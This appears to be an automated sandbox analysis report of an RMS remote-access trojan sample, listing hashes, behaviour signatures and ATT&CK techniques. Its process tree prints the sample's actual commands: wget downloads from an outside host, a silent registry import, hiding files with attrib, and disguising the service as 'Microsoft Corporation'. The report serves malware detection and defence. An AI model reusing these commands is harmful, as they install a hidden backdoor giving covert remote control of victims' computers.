rms | 505cd63c932062ba1588274ab66fc52ca88bdb017481ce2286d54e096eab773f

Analysis

max time kernel
146s
max time network
213s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
28-11-2022 03:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

505cd63c932062ba1588274ab66fc52ca88bdb017481ce2286d54e096eab773f.exe
Size

1.3MB
MD5

9b0203bba061b219a93707efbd1e7c7a
SHA1

252c00ee2749e0d1db79553cf49334c240908cad
SHA256

505cd63c932062ba1588274ab66fc52ca88bdb017481ce2286d54e096eab773f
SHA512

6ee37a8e637343581fe1c004a3fbdc23b5a5b3e6b1ed1f10b3b42fac1144f147384fcb94c80bae72dd8efc2db14742828bcf1f018bdddd1d41fc4c037b2a2225
SSDEEP

24576:PaUxvxK4nXQEuJhZMPfpwAuTJOmzORONakqXRlaL8TsJyyMptS:5JKyXvuDUfUHTNZwaL8IJyhps

Score

10^/10

rms evasion rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Executes dropped EXE 3 IoCs

pid	Process
2024	wget.exe
1536	wget.exe
1600	7z.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
2016	attrib.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000136d5-85.dat	upx
behavioral1/files/0x00070000000136d5-86.dat	upx
behavioral1/files/0x00070000000136d5-87.dat	upx
behavioral1/files/0x00070000000136d5-89.dat	upx
behavioral1/memory/2024-93-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2024-98-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/files/0x00070000000136d5-99.dat	upx
behavioral1/files/0x00070000000136d5-100.dat	upx
behavioral1/files/0x00070000000136d5-102.dat	upx
behavioral1/memory/1536-104-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/1536-105-0x0000000000400000-0x00000000004EF000-memory.dmp	upx

Loads dropped DLL 6 IoCs

pid	Process
1852	cmd.exe
1852	cmd.exe
1852	cmd.exe
1852	cmd.exe
1852	cmd.exe
1852	cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\control.ini	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
1260	timeout.exe
336	timeout.exe
868	timeout.exe
1128	timeout.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
816	tasklist.exe
1584	tasklist.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
1844	taskkill.exe
1740	taskkill.exe

Runs .reg file with regedit 1 IoCs

pid	Process
1704	regedit.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1712	PING.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1844	taskkill.exe
Token: SeDebugPrivilege	1740	taskkill.exe
Token: SeDebugPrivilege	816	tasklist.exe
Token: SeDebugPrivilege	1584	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 668 wrote to memory of 1320	668	505cd63c932062ba1588274ab66fc52ca88bdb017481ce2286d54e096eab773f.exe	28
PID 668 wrote to memory of 1320	668	505cd63c932062ba1588274ab66fc52ca88bdb017481ce2286d54e096eab773f.exe	28
PID 668 wrote to memory of 1320	668	505cd63c932062ba1588274ab66fc52ca88bdb017481ce2286d54e096eab773f.exe	28
PID 668 wrote to memory of 1320	668	505cd63c932062ba1588274ab66fc52ca88bdb017481ce2286d54e096eab773f.exe	28
PID 668 wrote to memory of 1320	668	505cd63c932062ba1588274ab66fc52ca88bdb017481ce2286d54e096eab773f.exe	28
PID 668 wrote to memory of 1320	668	505cd63c932062ba1588274ab66fc52ca88bdb017481ce2286d54e096eab773f.exe	28
PID 668 wrote to memory of 1320	668	505cd63c932062ba1588274ab66fc52ca88bdb017481ce2286d54e096eab773f.exe	28
PID 1320 wrote to memory of 1820	1320	WScript.exe	29
PID 1320 wrote to memory of 1820	1320	WScript.exe	29
PID 1320 wrote to memory of 1820	1320	WScript.exe	29
PID 1320 wrote to memory of 1820	1320	WScript.exe	29
PID 1320 wrote to memory of 1820	1320	WScript.exe	29
PID 1320 wrote to memory of 1820	1320	WScript.exe	29
PID 1320 wrote to memory of 1820	1320	WScript.exe	29
PID 1820 wrote to memory of 1600	1820	cmd.exe	31
PID 1820 wrote to memory of 1600	1820	cmd.exe	31
PID 1820 wrote to memory of 1600	1820	cmd.exe	31
PID 1820 wrote to memory of 1600	1820	cmd.exe	31
PID 1820 wrote to memory of 1600	1820	cmd.exe	31
PID 1820 wrote to memory of 1600	1820	cmd.exe	31
PID 1820 wrote to memory of 1600	1820	cmd.exe	31
PID 1820 wrote to memory of 1844	1820	cmd.exe	32
PID 1820 wrote to memory of 1844	1820	cmd.exe	32
PID 1820 wrote to memory of 1844	1820	cmd.exe	32
PID 1820 wrote to memory of 1844	1820	cmd.exe	32
PID 1820 wrote to memory of 1844	1820	cmd.exe	32
PID 1820 wrote to memory of 1844	1820	cmd.exe	32
PID 1820 wrote to memory of 1844	1820	cmd.exe	32
PID 1820 wrote to memory of 1740	1820	cmd.exe	34
PID 1820 wrote to memory of 1740	1820	cmd.exe	34
PID 1820 wrote to memory of 1740	1820	cmd.exe	34
PID 1820 wrote to memory of 1740	1820	cmd.exe	34
PID 1820 wrote to memory of 1740	1820	cmd.exe	34
PID 1820 wrote to memory of 1740	1820	cmd.exe	34
PID 1820 wrote to memory of 1740	1820	cmd.exe	34
PID 1820 wrote to memory of 868	1820	cmd.exe	35
PID 1820 wrote to memory of 868	1820	cmd.exe	35
PID 1820 wrote to memory of 868	1820	cmd.exe	35
PID 1820 wrote to memory of 868	1820	cmd.exe	35
PID 1820 wrote to memory of 868	1820	cmd.exe	35
PID 1820 wrote to memory of 868	1820	cmd.exe	35
PID 1820 wrote to memory of 868	1820	cmd.exe	35
PID 1820 wrote to memory of 1492	1820	cmd.exe	36
PID 1820 wrote to memory of 1492	1820	cmd.exe	36
PID 1820 wrote to memory of 1492	1820	cmd.exe	36
PID 1820 wrote to memory of 1492	1820	cmd.exe	36
PID 1820 wrote to memory of 1492	1820	cmd.exe	36
PID 1820 wrote to memory of 1492	1820	cmd.exe	36
PID 1820 wrote to memory of 1492	1820	cmd.exe	36
PID 1820 wrote to memory of 1128	1820	cmd.exe	37
PID 1820 wrote to memory of 1128	1820	cmd.exe	37
PID 1820 wrote to memory of 1128	1820	cmd.exe	37
PID 1820 wrote to memory of 1128	1820	cmd.exe	37
PID 1820 wrote to memory of 1128	1820	cmd.exe	37
PID 1820 wrote to memory of 1128	1820	cmd.exe	37
PID 1820 wrote to memory of 1128	1820	cmd.exe	37
PID 1492 wrote to memory of 1852	1492	WScript.exe	38
PID 1492 wrote to memory of 1852	1492	WScript.exe	38
PID 1492 wrote to memory of 1852	1492	WScript.exe	38
PID 1492 wrote to memory of 1852	1492	WScript.exe	38
PID 1492 wrote to memory of 1852	1492	WScript.exe	38
PID 1492 wrote to memory of 1852	1492	WScript.exe	38
PID 1492 wrote to memory of 1852	1492	WScript.exe	38
PID 1852 wrote to memory of 1712	1852	cmd.exe	40

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2016	attrib.exe
1224	attrib.exe
188	attrib.exe

C:\Users\Admin\AppData\Local\Temp\505cd63c932062ba1588274ab66fc52ca88bdb017481ce2286d54e096eab773f.exe
"C:\Users\Admin\AppData\Local\Temp\505cd63c932062ba1588274ab66fc52ca88bdb017481ce2286d54e096eab773f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:668
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\exes\ios.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1320
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\exes\setup.bat" "
    3⤵
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:1820
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
      4⤵
      PID:1600
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im rfusclient.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1844
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im rutserv.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1740
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 2
      4⤵
      Delays execution with timeout.exe
      PID:868
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\exes\bat.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1492
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\exes\bat.bat" "
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1852
      - C:\Windows\SysWOW64\PING.EXE
        
        ping xnext.esy.es -n setup
        6⤵
        Runs ping.exe
        
        PID:1712
      - C:\Users\Admin\AppData\Local\Temp\exes\wget.exe
        
        wget.exe http://xnext.esy.es/files_7z/files2.part
        6⤵
        Executes dropped EXE
        
        PID:2024
      - C:\Users\Admin\AppData\Local\Temp\exes\wget.exe
        
        wget.exe http://xnext.esy.es/reg_users/test55/regedit.reg
        6⤵
        Executes dropped EXE
        
        PID:1536
      - C:\Users\Admin\AppData\Local\Temp\exes\7z.exe
        
        7z.exe x -y -p1895 files.7z
        6⤵
        Executes dropped EXE
        
        PID:1600
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 2
      4⤵
      Delays execution with timeout.exe
      PID:1128
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq wget.exe" /NH
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:816
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /i "wget.exe"
      4⤵
      PID:1940
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1260
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq 7z.exe" /NH
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1584
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /i "7z.exe"
      4⤵
      PID:564
  - - C:\Windows\SysWOW64\regedit.exe
      regedit /s "regedit.reg"
      4⤵
      Runs .reg file with regedit
      PID:1704
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /v FUSClientPath /t REG_SZ /d "C:\Windows\en-US\DRVSTORE\Dism\ru-RU\security\ApplicationId\PolicyManagement\PolicyManagement\System\32\Web\Histoty\rfusclient.exe" /f
      4⤵
      PID:1844
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h "C:\Windows\en-US\DRVSTORE\Dism\ru-RU\security\ApplicationId\PolicyManagement\PolicyManagement\System\32\Web\Histoty\*.*"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2016
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -s -h "C:\Windows\en-US\DRVSTORE\Dism\ru-RU\security\ApplicationId\PolicyManagement\PolicyManagement\System\32\Web\Histoty\vp8decoder.dll"
      4⤵
      Views/modifies file attributes
      PID:1224
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -s -h "C:\Windows\en-US\DRVSTORE\Dism\ru-RU\security\ApplicationId\PolicyManagement\PolicyManagement\System\32\Web\Histoty\vp8encoder.dll"
      4⤵
      Views/modifies file attributes
      PID:188
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet00setup\services\RManService" /v DisplayName /t REG_SZ /d "Microsoft Corporation" /f
      4⤵
      PID:1560
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet00setup\services\RManService" /v Description /t REG_SZ /d "Microsoft Windows" /f
      4⤵
      PID:1772
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:336

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Credential Access

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\exes\7z.dll

Filesize
893KB

MD5
04ad4b80880b32c94be8d0886482c774

SHA1
344faf61c3eb76f4a2fb6452e83ed16c9cce73e0

SHA256
a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338

SHA512
3e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\exes\7z.exe

Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\exes\7z.exe

Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\exes\bat.bat

Filesize
271B

MD5
681913b7b79c1dec9c57a0562d022bad

SHA1
00180aff172cf9ba182dd014edd720374654ca05

SHA256
86945a2c1bc6da7d9c73d488521ef4309a040e188391f7b712162424d912fc48

SHA512
b4d5f815ffa8dda87b13cb470a7d067f5cf7f9620a09626e5db1e1624dc5ae13caa6ee9e5524fa0283c3a35aef4a2da712160c12c6607ff39fe7d4bd71ab55dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\exes\bat.vbs

Filesize
113B

MD5
9a9ec59df719a15b2cadb19ecce9adfd

SHA1
172b551d1d04c93c8bb52ead5a88b084e3c8f469

SHA256
9413f4a4084d653e2acd3ea80282a261d8356f2605ae7a502ef364c54d4ab2d8

SHA512
1f1f678802ad5d5b86824ae789d8ebc64abc8d84686118051f73cfb0f3c6ff41ef19478f4073040d864fc697fe047bf7cd715632eb9b1b1f4d6e4e5799907b20

Download Submit
C:\Users\Admin\AppData\Local\Temp\exes\ios.vbs

Filesize
181B

MD5
97940582cc77eb606a9258be774ae244

SHA1
5a59e37579349159a52d778d941e60b7cf452dd2

SHA256
1628588c5df4f1af604a07089994f3c40a1dc705f8f036d2ca07c09cedcf3b87

SHA512
e7d26aefd1ad67928c2f788838271b2d76775d8d48abadf31d6f76ba534249c3cf375384024571ddd59c9d42e894b002808660f5e6eca3971ffdf7134446d4b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\exes\setup.bat

Filesize
15KB

MD5
ac2dba570bc68d20936c7c2adead2967

SHA1
ff753931f0ca25dafdd0b262f0726ca9ebf7c6d3

SHA256
f451f54ec3cf60fdfde055bd146f483b89a43b0bf8d16ffaa8981e32030d4978

SHA512
59f31b3be442e3c682076550b4126bf461b2c2b28c15324bf4e89394192d7e8d7290abd3b7d79307eb3f98a8afcaf1e0005f36715a26f9cd13154fb9d69030b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\exes\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\exes\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\exes\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
\Users\Admin\AppData\Local\Temp\exes\7z.exe

Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
\Users\Admin\AppData\Local\Temp\exes\7z.exe

Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
\Users\Admin\AppData\Local\Temp\exes\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
\Users\Admin\AppData\Local\Temp\exes\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
\Users\Admin\AppData\Local\Temp\exes\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
\Users\Admin\AppData\Local\Temp\exes\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
memory/668-54-0x0000000076391000-0x0000000076393000-memory.dmp

Filesize
8KB

Download
memory/1536-104-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/1536-105-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/1852-92-0x0000000001DD0000-0x0000000001EBF000-memory.dmp

Filesize
956KB

Download
memory/1852-91-0x0000000001DD0000-0x0000000001EBF000-memory.dmp

Filesize
956KB

Download
memory/2024-98-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/2024-93-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads